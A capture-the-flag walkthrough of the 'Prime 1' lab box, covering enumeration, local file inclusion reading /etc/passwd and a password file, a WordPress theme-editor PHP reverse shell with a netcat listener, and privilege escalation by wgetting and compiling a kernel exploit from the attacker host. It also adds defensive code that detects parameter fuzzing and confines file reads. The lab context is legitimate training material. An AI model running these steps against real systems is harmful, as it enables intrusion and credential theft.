# Prime 1

## Enumeration

### nmap

```
nmap -sC -sV -oA nmap/Prime1 192.168.1.113
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-17 06:04 EDT
Nmap scan report for ubuntu (192.168.1.113)
Host is up (0.00013s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
|   256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
|_  256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HacknPentest
MAC Address: 00:0C:29:B5:6E:B3 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.35 seconds
```

Let's put the IP into the browser and see what we have.

![](/files/-M7YPd9n5MoTXciOGvvP)

Nothing much. So let's use `dirb` to enumerate directories.

### dirb

```
dirb http://192.168.1.113
```

```
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun May 17 12:20:36 2020
URL_BASE: http://192.168.1.113/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.113/ ----
+ http://192.168.1.113/dev (CODE:200|SIZE:131)                                                                                   
+ http://192.168.1.113/index.php (CODE:200|SIZE:136)                                                                             
==> DIRECTORY: http://192.168.1.113/javascript/                                                                                  
+ http://192.168.1.113/server-status (CODE:403|SIZE:301)                                                                         
==> DIRECTORY: http://192.168.1.113/wordpress/                                                                                   
                                                                                                                                 
---- Entering directory: http://192.168.1.113/javascript/ ----
==> DIRECTORY: http://192.168.1.113/javascript/jquery/                                                                           
                                                                                                                                 
---- Entering directory: http://192.168.1.113/wordpress/ ----
+ http://192.168.1.113/wordpress/index.php (CODE:301|SIZE:0)                                                                     
==> DIRECTORY: http://192.168.1.113/wordpress/wp-admin/                                                                          
==> DIRECTORY: http://192.168.1.113/wordpress/wp-content/                                                                        
==> DIRECTORY: http://192.168.1.113/wordpress/wp-includes/                                                                       
+ http://192.168.1.113/wordpress/xmlrpc.php (CODE:405|SIZE:42)                                                                   
                                                                                                                                 
---- Entering directory: http://192.168.1.113/javascript/jquery/ ----
+ http://192.168.1.113/javascript/jquery/jquery (CODE:200|SIZE:284394)                                                           
                                                                                                                                 
---- Entering directory: http://192.168.1.113/wordpress/wp-admin/ ----
+ http://192.168.1.113/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)                                                            
==> DIRECTORY: http://192.168.1.113/wordpress/wp-admin/css/                                                                      
==> DIRECTORY: http://192.168.1.113/wordpress/wp-admin/images/                                                                   
==> DIRECTORY: http://192.168.1.113/wordpress/wp-admin/includes/                                                                 
+ http://192.168.1.113/wordpress/wp-admin/index.php (CODE:302|SIZE:0)                                                            
==> DIRECTORY: http://192.168.1.113/wordpress/wp-admin/js/                                                                       
==> DIRECTORY: http://192.168.1.113/wordpress/wp-admin/maint/                                                                    
==> DIRECTORY: http://192.168.1.113/wordpress/wp-admin/network/                                                                  
==> DIRECTORY: http://192.168.1.113/wordpress/wp-admin/user/                                                                     
                                                                                                                                 
---- Entering directory: http://192.168.1.113/wordpress/wp-content/ ----
+ http://192.168.1.113/wordpress/wp-content/index.php (CODE:200|SIZE:0)                                                          
==> DIRECTORY: http://192.168.1.113/wordpress/wp-content/plugins/                                                                
==> DIRECTORY: http://192.168.1.113/wordpress/wp-content/themes/                                                                 
==> DIRECTORY: http://192.168.1.113/wordpress/wp-content/uploads/                                                                
                                                                                                                                 
---- Entering directory: http://192.168.1.113/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                 
---- Entering directory: http://192.168.1.113/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                 
---- Entering directory: http://192.168.1.113/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                 
---- Entering directory: http://192.168.1.113/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                 
---- Entering directory: http://192.168.1.113/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                 
---- Entering directory: http://192.168.1.113/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                 
---- Entering directory: http://192.168.1.113/wordpress/wp-admin/network/ ----
+ http://192.168.1.113/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)                                                    
+ http://192.168.1.113/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)                                                    
                                                                                                                                 
---- Entering directory: http://192.168.1.113/wordpress/wp-admin/user/ ----
+ http://192.168.1.113/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)                                                       
+ http://192.168.1.113/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)                                                       
                                                                                                                                 
---- Entering directory: http://192.168.1.113/wordpress/wp-content/plugins/ ----
+ http://192.168.1.113/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)                                                  
                                                                                                                                 
---- Entering directory: http://192.168.1.113/wordpress/wp-content/themes/ ----
+ http://192.168.1.113/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)                                                   
                                                                                                                                 
---- Entering directory: http://192.168.1.113/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sun May 17 12:21:25 2020
DOWNLOADED: 46120 - FOUND: 15

```

Let's navigate to `dev` and see what we get.

![](/files/-M7YQgwSh4--nUanAQjv)

Next, we run `dirb` again, this time with the `-X` option and the argument `.txt`, so that every word is also tried with that extension.

```
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun May 17 12:24:48 2020
URL_BASE: http://192.168.1.113/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.txt) | (.txt) [NUM = 1]

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.113/ ----
+ http://192.168.1.113/secret.txt (CODE:200|SIZE:412)                                                                            
                                                                                                                                 
-----------------
END_TIME: Sun May 17 12:24:54 2020
DOWNLOADED: 4612 - FOUND: 1

```

We got a file called `secret.txt`.

![](/files/-M7YS9g09_FNZNj9pWTV)

Inside it there is a [link](https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web) to a page describing the method we use next, called fuzzing.

### Fuzzing

#### wfuzz

We first need to find the word count of the default response, so that we can filter it out.

```
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://192.168.1.113/index.php?FUZZ=something
```

```
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.1.113/index.php?FUZZ=something
Total requests: 949

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                          
===================================================================

000000001:   200        7 L      12 W     136 Ch      "@"                                                              
000000002:   200        7 L      12 W     136 Ch      "00"                                                             
000000003:   200        7 L      12 W     136 Ch      "01"                                                             
000000004:   200        7 L      12 W     136 Ch      "02"                                                             
000000005:   200        7 L      12 W     136 Ch      "03"                                                             
000000006:   200        7 L      12 W     136 Ch      "1"                                                              
000000008:   200        7 L      12 W     136 Ch      "100"                                                            
000000007:   200        7 L      12 W     136 Ch      "10"  
```

As we can see, every response is 12 words, so we add the `--hw 12` parameter, which hides all responses with a word count of 12.

Then we can run the command below.

```
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 12 http://192.168.1.113/index.php?FUZZ=something
```

```
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.1.113/index.php?FUZZ=something
Total requests: 949

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                          
===================================================================

000000340:   200        7 L      19 W     206 Ch      "file"                                                           

Total time: 1.358470
Processed Requests: 949
Filtered Requests: 948
Requests/sec.: 698.5795

```

Now we know that there is a parameter called `file`. From there we can go to `index.php` and append `?file=location.txt` to the URL, using the file name that `secret.txt` provided for us.
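From the defender's side, the parameter sweep above leaves a very recognisable trace in the Apache access log. The following Python detector is an added example, not part of the original writeup: it runs over a constructed log sample, flags a client that tries many distinct query parameter names against one path within a few seconds, and reports which name drew a different-sized response, the same signal the `--hw` filter gave the attacker.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" log line; only the fields the detector needs are captured.
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" (\d{3}) (\d+|-)')

# Constructed sample: 192.168.1.112 sweeps parameter names against index.php
# the way wfuzz did above, while 192.168.1.50 browses normally.
SAMPLE_LOG = """\
192.168.1.112 - - [17/May/2020:12:30:01 -0400] "GET /index.php?@=something HTTP/1.1" 200 136 "-" "Wfuzz/2.4.5"
192.168.1.112 - - [17/May/2020:12:30:01 -0400] "GET /index.php?00=something HTTP/1.1" 200 136 "-" "Wfuzz/2.4.5"
192.168.1.112 - - [17/May/2020:12:30:01 -0400] "GET /index.php?01=something HTTP/1.1" 200 136 "-" "Wfuzz/2.4.5"
192.168.1.112 - - [17/May/2020:12:30:02 -0400] "GET /index.php?file=something HTTP/1.1" 200 206 "-" "Wfuzz/2.4.5"
192.168.1.112 - - [17/May/2020:12:30:02 -0400] "GET /index.php?id=something HTTP/1.1" 200 136 "-" "Wfuzz/2.4.5"
192.168.1.112 - - [17/May/2020:12:30:02 -0400] "GET /index.php?page=something HTTP/1.1" 200 136 "-" "Wfuzz/2.4.5"
192.168.1.50 - - [17/May/2020:12:31:10 -0400] "GET /wordpress/?p=1 HTTP/1.1" 200 4213 "-" "Mozilla/5.0"
192.168.1.50 - - [17/May/2020:12:31:12 -0400] "GET /wordpress/?p=2 HTTP/1.1" 200 4190 "-" "Mozilla/5.0"
"""

def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, ts, target, status, size = m.groups()
    url = urlsplit(target)
    names = {k for k, _ in parse_qsl(url.query, keep_blank_values=True)}
    return {"client": client, "path": url.path, "params": names,
            "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
            "status": int(status), "size": 0 if size == "-" else int(size)}

def detect_param_fuzzing(lines, min_names=5, window=timedelta(seconds=10)):
    """Alert on any (client, path) that tries >= min_names distinct query
    parameter names inside `window`.  The alert also lists the names whose
    response size differed from the common one: the hits a --hw/--hh filter
    would have shown the attacker, i.e. the parameter that was found."""
    by_target = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["params"]:
            by_target[(rec["client"], rec["path"])].append(rec)
    alerts = []
    for (client, path), recs in by_target.items():
        recs.sort(key=lambda r: r["time"])
        start, burst = 0, False
        for end, rec in enumerate(recs):
            while rec["time"] - recs[start]["time"] > window:
                start += 1  # slide the window forward
            seen = {p for r in recs[start:end + 1] for p in r["params"]}
            if len(seen) >= min_names:
                burst = True
                break
        if not burst:
            continue
        names = {p for r in recs for p in r["params"]}
        common = Counter(r["size"] for r in recs).most_common(1)[0][0]
        odd = sorted({p for r in recs if r["size"] != common for p in r["params"]})
        alerts.append({"client": client, "path": path,
                       "distinct_names": len(names), "outliers": odd})
    return alerts
```

Running `detect_param_fuzzing(SAMPLE_LOG.splitlines())` on the constructed sample yields a single alert for `192.168.1.112` against `/index.php` with six distinct names and `file` as the outlier, while the normal browsing client is left alone.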

![](/files/-M7YYR8Ri4YYPZE4ZbCp)

This gives us `secrettier360`, to be used on another PHP page. Let's use `gobuster` to enumerate further.

### gobuster

```
gobuster dir -u http://192.168.1.113/ -w /usr/share/wordlists/dirb/common.txt -x .php
```

```
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.113/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/05/17 12:54:49 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.php (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htaccess.php (Status: 403)
/dev (Status: 200)
/image.php (Status: 200)
/index.php (Status: 200)
/index.php (Status: 200)
/javascript (Status: 301)
/server-status (Status: 403)
/wordpress (Status: 301)
===============================================================
2020/05/17 12:54:51 Finished
===============================================================
```

As we can see, we have another PHP file called `image.php`.

Let's use `wfuzz` again and repeat the steps above, first finding the word count of the default response.

```
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://192.168.1.113/image.php?secrettier360=FUZZ
```

```

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.1.113/image.php?secrettier360=FUZZ
Total requests: 949

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                          
===================================================================

000000001:   200        6 L      17 W     197 Ch      "@"                                                              
000000002:   200        6 L      17 W     197 Ch      "00"                                                             
000000003:   200        6 L      17 W     197 Ch      "01"                                                             
000000004:   200        6 L      17 W     197 Ch      "02"                                                             
000000005:   200        6 L      17 W     197 Ch      "03"                                                             
000000012:   200        6 L      17 W     197 Ch      "20"                                                             
000000014:   200        6 L      17 W     197 Ch      "2000"                                                           
000000006:   200        6 L      17 W     197 Ch      "1"      
```

As we can see, the default response is 17 words, so we set the `--hw` argument to 17.

```
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.1.113/image.php?secrettier360=FUZZ
Total requests: 949

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                          
===================================================================

000000256:   200        13 L     43 W     328 Ch      "dev"                                                            

Total time: 1.601662
Processed Requests: 949
Filtered Requests: 948
Requests/sec.: 592.5094

```

We then get `dev`; let's supply it as the parameter value in the URL.

![](/files/-M7Ydlgcgl6NmR83L1nn)

![](/files/-M7Ydo8ok4A9g82Qc8Ll)

Next we can replace `dev` with `/etc/passwd`, which confirms that the parameter reads arbitrary local files.

![](/files/-M7Ye7C1mm8Bt2fBMrzs)

We can see a `password.txt` entry in the `/home/saket` directory, so let's replace `/etc/passwd` with `/home/saket/password.txt`.

![](/files/-M7YeL3dWazplzPIxVik)

We get a password: `follow_the_ippsec`.
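The `secrettier360` parameter reads whatever path it is given, which is what turned a hidden parameter into a credential leak. The source of `image.php` is not shown on the page, so the following Python is an added example, not the box's own code, that assumes the handler reads a file named by the parameter from a directory under the web root: it shows that unsafe pattern beside a reader that confines the value to its directory, exercised on a constructed web root and a constructed stand-in for `/home/saket/password.txt`.

```python
import tempfile
from pathlib import Path


def read_unsafe(base_dir, name):
    """Assumed shape of image.php: the parameter value becomes a path with no
    validation.  Joining it to a base directory does not help, because an
    absolute value such as /etc/passwd replaces the base and '../' walks out."""
    return (Path(base_dir) / name).read_text()


def read_safe(base_dir, name):
    """Serve `name` only if it resolves to a regular file inside base_dir.
    resolve() follows symlinks and collapses '..', so a symlink planted inside
    the directory that points at /home/saket/password.txt is rejected too."""
    base = Path(base_dir).resolve()
    target = (base / name).resolve()
    if base not in target.parents:
        raise PermissionError(f"{name!r} resolves outside {base}")
    if not target.is_file():
        raise FileNotFoundError(name)
    return target.read_text()


def demo():
    """Constructed web root holding only 'dev', plus a constructed secret file
    outside it standing in for /home/saket/password.txt.  Returns what the
    unsafe reader leaked and the safe reader's verdict for each value tried."""
    with tempfile.TemporaryDirectory() as root, \
            tempfile.TemporaryDirectory() as home:
        Path(root, "dev").write_text("constructed image data\n")
        secret = Path(home, "password.txt")
        secret.write_text("constructed_secret\n")
        leaked = read_unsafe(root, str(secret))  # the leak seen on this box
        verdicts = {}
        for value in ("dev", str(secret), "/etc/passwd", "../../../../etc/passwd"):
            try:
                read_safe(root, value)
                verdicts[value] = "served"
            except (PermissionError, FileNotFoundError):
                verdicts[value] = "rejected"
        return leaked, verdicts


if __name__ == "__main__":
    leaked, verdicts = demo()
    print("unsafe reader returned:", leaked.strip())
    for value, verdict in verdicts.items():
        print(f"safe reader, {value}: {verdict}")
```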

## Reverse Shell

We found a WordPress site earlier.

![](/files/-M7Yeot7UKJNqebLOPy4)

Then we go to the login page and enter the username `victor` with the password `follow_the_ippsec`.

![](/files/-M7YfPZvhkkj9C8Si5N3)

We are logged into the admin panel.

After wandering around, go to `Appearance` and then `Theme Editor`.

![](/files/-M7Yg6eL97ZqZZ1V7y4E)

On the right side, there is a PHP file called `secret.php`.

![](/files/-M7YgEMulmIAn7qyRTZh)

This file can be edited; a hardened WordPress install would have the theme editor disabled by setting `DISALLOW_FILE_EDIT` in `wp-config.php`.

We can go to [pentestmonkey](http://pentestmonkey.net/tools/web-shells/php-reverse-shell) and grab the php reverse shell file

Copy the whole content of the file into the WordPress editor, then change the IP and port, and update the file.

Before that we need to set up a listener on our machine.

```
nc -nlvp 4444
```

Then at the URL, navigate to `/wordpress/wp-content/themes/twentynineteen/secret.php`

![](/files/-M7YiqBNjUPsyHuTLJ_w)

We got a shell!

## Privilege Escalation

![](/files/-M7Yj5MUeJxBv2T9G9MY)

Navigate to `/home/saket` and get the user flag.

### Method 1

![](/files/-M7YjKfos9ETVCfsRLtU)

```
searchsploit 16.04 Ubuntu | grep Privilege
```

![](/files/-M7YjhjHnEUruO0VuyVa)

Copy the exploit source to the current directory.

Then, on our machine, we use Python to serve the file.

```
python -m SimpleHTTPServer
```

In the shell, navigate to the `/tmp` folder.

Then type `wget 192.168.1.112:8000/45010.c`.

After that, type `gcc 45010.c -o exploit`.

Then `chmod +x exploit`.

Run the exploit by typing `./exploit`.

Type `/bin/bash -i` to get a proper shell.

![](/files/-M7YkoyVOQqQsz7Q3gOr)

Navigate to `/root` and cat `root.txt` to get the flag.

Congratulations!

### Method 2

Type `sudo -l` and we get this:

![](/files/-M7_jqQT7_Qhk7RUdN0O)

Navigate to `/home/saket` and we will see an executable file called `enc`.

![](/files/-M7_k16xvrvZ-aUlA6ha)

Nothing seems to happen. After further enumeration, we find that there is a `/opt/backup/server_database` file, and it contains a backup password.

![](/files/-M7_kQ0cEeZ00Cz_Cd3X)

Navigate back to the `enc` file directory and run it with `sudo ./enc`

![](/files/-M7_khTMVeJGPYiHQesr)

![](/files/-M7_kkFv5mtUKuJ942Ep)

We get two files, `enc.txt` and `key.txt`.

![](/files/-M7_kwkjbasoJbjR-ZMB)

![](/files/-M7_lMUQZ0s_2ud27uMZ)

We first convert the string `ippsec` to its MD5 hash, since the file tells us to do so.

Using this online [tool](https://www.devglan.com/online-tools/aes-encryption-decryption), I managed to get the plaintext from the encrypted `enc.txt`:

> Dont worry saket one day we will reach toour destination very soon. And if you forget your username then use your old password==> "tribute\_to\_ippsec"Victor,

We can see the password is `tribute_to_ippsec`; let's `su` to the `saket` user account.

Then type `sudo -l`.

![](/files/-M7_nq4QRvryWtcSU4dB)

Navigate to victor's home directory and run `sudo /home/victor/undefeated_victor`.

![](/files/-M7_oG3ISKChL1FCVg6z)

We find out that there is no bash for the user victor, so we can type

```
cp /bin/bash /tmp/challenge
```

so that there is a shell victor can access.

Run it again with `sudo /home/victor/undefeated_victor`.

![](/files/-M7_ouNLhLXTtm1PfEkf)

Got root!

Navigate to `/root` and cat `root.txt` to get the flag!

Congratulations!
